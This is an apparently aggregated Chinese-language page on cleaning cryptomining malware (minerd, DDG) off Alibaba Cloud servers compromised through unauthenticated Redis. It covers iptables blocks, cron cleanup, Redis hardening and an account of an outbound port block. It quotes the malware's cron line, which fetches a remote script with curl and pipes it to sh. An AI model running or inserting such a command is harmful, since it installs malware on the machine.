阿里雲挖礦病毒殺死tomcat

① 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

② 阿里雲yum工具和出站80埠不可用的問題排查一例

收到阿里雲簡訊/站內信提醒，線上某資源被病毒入侵。查看告警詳情及登錄伺服器後確認是感染了DDG挖礦病毒，入侵點是redis。由於病毒行為復雜，難以徹底清除對系統的修改，決定重置該實例然後重新部署服務。

實例重置後，發現yum無法使用。提示yum連接超時，連接的目標主機是阿里雲的yum源（233.*的IP地址，為外網地址），協議為HTTP。

進一步測試發現DNS解析正常，curl訪問內網的80埠正常，訪問外網所有80埠均超時，訪問外網的8080/443等部分非80埠正常。

經檢查機器的iptables沒有啟用，阿里雲安全組出站方向無限制。隨後提交工單聯系阿里雲。

售後客服在工單中答復，之前機器被檢測到有大量web攻擊行為，阿里雲已對該實例進行了出站特定埠封禁處理。在工單內表示問題已經排除後，客服提前人工解除封禁。

這類封禁處理不會體現在安全組，可以在 雲盾安全管控管理控制台 來查看封禁記錄。這個控制台也可以在阿里雲控制台右上角賬戶圖標--安全管控--處罰列表處進入。另外，處罰通知也會以站內信的方式發送（是否有簡訊暫不明確），所以及時查收站內信非常必要。

作為RAM用戶身份登錄難以保持登錄狀態，同時主賬號對通知方式的設置不合理，加上對阿里雲檢測和通知機制不夠熟悉，導致這次問題排查持續時間較久。

阿里雲 yum 出站 埠 封禁 入侵

③ 阿里雲因未及時上報漏洞被處罰，該漏洞有著怎樣的嚴重性

該漏洞可以被犯罪分子或者網路黑客用於強制安裝惡意程序、傳播病毒並且植入木馬等。而且系統漏洞很容易導致計算機上的關鍵信息和信息內容被盜，嚴重的情況會導致實際操作系統被破壞，計算機上的所有數據和信息都會丟失。

一個精緻的計算機病毒程序，進入系統後一般不容易立即發病，而是潛伏在合理合法的文件中。病毒通常可以潛伏很長時間而不被發現。病毒的自限性越好，在系統中存在的時間越長，病毒感染的范圍就越大。指病毒因某一時間或標志的發生而引誘病毒執行感或進攻的特點。計算機中毒後，很可能會導致所有正常程序無法運行，損壞計算機中的刪除文件或不同水平的計算機文件。計算機病毒具有很強的隱藏性，有的可以根據計算機殺毒軟體進行檢測，有的基本找不到，這種病毒通常很難解決。